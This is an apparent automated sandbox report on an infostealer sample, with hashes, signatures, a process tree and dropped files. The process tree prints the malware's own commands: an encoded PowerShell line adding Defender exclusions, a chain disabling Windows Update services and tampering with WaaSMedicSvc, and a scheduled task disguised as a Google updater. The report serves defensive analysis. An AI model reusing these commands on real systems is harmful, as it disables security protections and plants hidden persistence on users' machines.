Analysis
-
max time kernel
150s -
max time network
71s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
04-05-2022 12:32
General
-
Target
10b4489a3ac26cb106896685ce42a04c2b6d977de9f0d250e6a3503d5c30405c.exe
-
Size
184KB
-
MD5
36f682e7bfc3c8fec5942271fefdd875
-
SHA1
d70e0fbd210f64763fcd4fcdc2e15742734c1728
-
SHA256
10b4489a3ac26cb106896685ce42a04c2b6d977de9f0d250e6a3503d5c30405c
-
SHA512
a4fdfa152703db74e139f482b0c833479007578c50750d992a035ad69e5cd08b4aef8cbe82085d9a6e3f11c886843b333fdf6289fc744315d6d8752eeb2358c5
Score
10/10
Malware Config
Signatures
-
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 7 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 32 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\10b4489a3ac26cb106896685ce42a04c2b6d977de9f0d250e6a3503d5c30405c.exe"C:\Users\Admin\AppData\Local\Temp\10b4489a3ac26cb106896685ce42a04c2b6d977de9f0d250e6a3503d5c30405c.exe"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\320591.exe"C:\Users\Admin\AppData\Local\320591.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\320591.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
-
C:\Windows\system32\sc.exesc stop bits5⤵
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Chrome\updater.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"6⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\320591.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Local\320591.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
443B
MD5f3a02a8234ba1a79da3e6c45e925851f
SHA1ba55191b01c10a22b3008e36a4b3125411c5eea9
SHA256c0e6fb4b810dfd281e46afbb1ff40e48214a9b2441759f5a90ff0cb7137c942a
SHA51280e31555d0972e1c2ceb1eefb1e17cc1cfdaf8c5c1e65e60b27983bb71581486c623045d5dd30f4533f8a5aa8e1d434db7f1898b2bb3a4a74cc4c18ce423b163
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
\Users\Admin\AppData\Local\Temp\DotNetZip.dllFilesize
461KB
MD5a999d7f3807564cc816c16f862a60bbe
SHA11ee724daaf70c6b0083bf589674b6f6d8427544f
SHA2568e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA5126f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
\Users\Admin\AppData\Local\Temp\DotNetZip.dllFilesize
461KB
MD5a999d7f3807564cc816c16f862a60bbe
SHA11ee724daaf70c6b0083bf589674b6f6d8427544f
SHA2568e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA5126f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dllFilesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dllFilesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dllFilesize
384KB
MD555c797383dbbbfe93c0fe3215b99b8ec
SHA11b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA2565fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dllFilesize
384KB
MD555c797383dbbbfe93c0fe3215b99b8ec
SHA11b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA2565fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dllFilesize
1.3MB
MD58be215abf1f36aa3d23555a671e7e3be
SHA1547d59580b7843f90aaca238012a8a0c886330e6
SHA25683f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae
SHA51238cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b
-
memory/192-318-0x0000000000000000-mapping.dmp
-
memory/288-317-0x0000000000000000-mapping.dmp
-
memory/428-306-0x0000000000000000-mapping.dmp
-
memory/508-313-0x0000000000000000-mapping.dmp
-
memory/600-312-0x0000000000000000-mapping.dmp
-
memory/740-310-0x0000000000000000-mapping.dmp
-
memory/780-309-0x0000000000000000-mapping.dmp
-
memory/952-311-0x0000000000000000-mapping.dmp
-
memory/1432-323-0x0000000000000000-mapping.dmp
-
memory/1636-326-0x0000000000000000-mapping.dmp
-
memory/1760-327-0x0000000000000000-mapping.dmp
-
memory/1868-332-0x0000000000000000-mapping.dmp
-
memory/2192-322-0x0000000000000000-mapping.dmp
-
memory/2212-321-0x0000000000000000-mapping.dmp
-
memory/2308-320-0x0000000000000000-mapping.dmp
-
memory/2424-152-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-222-0x0000000009BF0000-0x0000000009C56000-memory.dmpFilesize
408KB
-
memory/2424-147-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-148-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-149-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-150-0x0000000000700000-0x0000000000738000-memory.dmpFilesize
224KB
-
memory/2424-151-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-118-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-153-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-155-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-154-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-156-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-157-0x00000000028D0000-0x00000000028D6000-memory.dmpFilesize
24KB
-
memory/2424-158-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-159-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-160-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-161-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-162-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-163-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-164-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-165-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-166-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-167-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-168-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-169-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-170-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-171-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-172-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-173-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-174-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-175-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-176-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-177-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-178-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-179-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-181-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-180-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-182-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-183-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-196-0x00000000059E0000-0x0000000005A72000-memory.dmpFilesize
584KB
-
memory/2424-197-0x0000000006140000-0x000000000663E000-memory.dmpFilesize
5.0MB
-
memory/2424-145-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-144-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-204-0x0000000005EE0000-0x0000000005F90000-memory.dmpFilesize
704KB
-
memory/2424-205-0x0000000005E80000-0x0000000005ED0000-memory.dmpFilesize
320KB
-
memory/2424-206-0x0000000005F90000-0x0000000005FB2000-memory.dmpFilesize
136KB
-
memory/2424-143-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-142-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-210-0x0000000008400000-0x0000000008462000-memory.dmpFilesize
392KB
-
memory/2424-211-0x0000000008470000-0x00000000087C0000-memory.dmpFilesize
3.3MB
-
memory/2424-213-0x0000000005FC0000-0x000000000600B000-memory.dmpFilesize
300KB
-
memory/2424-215-0x0000000008990000-0x0000000008B52000-memory.dmpFilesize
1.8MB
-
memory/2424-141-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-219-0x0000000008DD0000-0x0000000008E0C000-memory.dmpFilesize
240KB
-
memory/2424-220-0x0000000008940000-0x0000000008960000-memory.dmpFilesize
128KB
-
memory/2424-146-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-140-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-139-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-232-0x0000000009CE0000-0x0000000009D5A000-memory.dmpFilesize
488KB
-
memory/2424-119-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-138-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-137-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-120-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-121-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-122-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-123-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-124-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-125-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-126-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-127-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-128-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-129-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-130-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-131-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-132-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-133-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-134-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-135-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2424-136-0x00000000774A0000-0x000000007762E000-memory.dmpFilesize
1.6MB
-
memory/2456-334-0x0000000000000000-mapping.dmp
-
memory/2608-330-0x0000000000000000-mapping.dmp
-
memory/2720-336-0x0000000000000000-mapping.dmp
-
memory/2816-328-0x0000000000000000-mapping.dmp
-
memory/2836-297-0x0000000000000000-mapping.dmp
-
memory/2856-331-0x0000000000000000-mapping.dmp
-
memory/3132-324-0x0000000000000000-mapping.dmp
-
memory/3256-314-0x0000000000000000-mapping.dmp
-
memory/3268-316-0x0000000000000000-mapping.dmp
-
memory/3328-301-0x0000000000000000-mapping.dmp
-
memory/3548-305-0x0000000000000000-mapping.dmp
-
memory/3572-303-0x0000000000000000-mapping.dmp
-
memory/3584-304-0x0000000000000000-mapping.dmp
-
memory/3652-300-0x0000000000000000-mapping.dmp
-
memory/3800-333-0x0000000000000000-mapping.dmp
-
memory/3848-307-0x0000000000000000-mapping.dmp
-
memory/3896-299-0x0000000000000000-mapping.dmp
-
memory/3900-319-0x0000000000000000-mapping.dmp
-
memory/3920-325-0x0000000000000000-mapping.dmp
-
memory/4128-329-0x0000000000000000-mapping.dmp
-
memory/4160-298-0x0000000000000000-mapping.dmp
-
memory/4164-308-0x0000000000000000-mapping.dmp
-
memory/4200-302-0x0000000000000000-mapping.dmp
-
memory/4428-296-0x0000000000000000-mapping.dmp
-
memory/4832-260-0x0000000000000000-mapping.dmp
-
memory/4832-265-0x000002C9A4EB0000-0x000002C9A4ED2000-memory.dmpFilesize
136KB
-
memory/4832-268-0x000002C9BD210000-0x000002C9BD286000-memory.dmpFilesize
472KB
-
memory/4840-240-0x0000000000000000-mapping.dmp
-
memory/4864-253-0x0000027025AA0000-0x0000027025EC0000-memory.dmpFilesize
4.1MB
-
memory/4864-252-0x000002700AE60000-0x000002700B29E000-memory.dmpFilesize
4.2MB
-
memory/4864-248-0x0000027025EE0000-0x000002702631E000-memory.dmpFilesize
4.2MB
-
memory/4940-259-0x0000000000000000-mapping.dmp
-
memory/5064-315-0x0000000000000000-mapping.dmp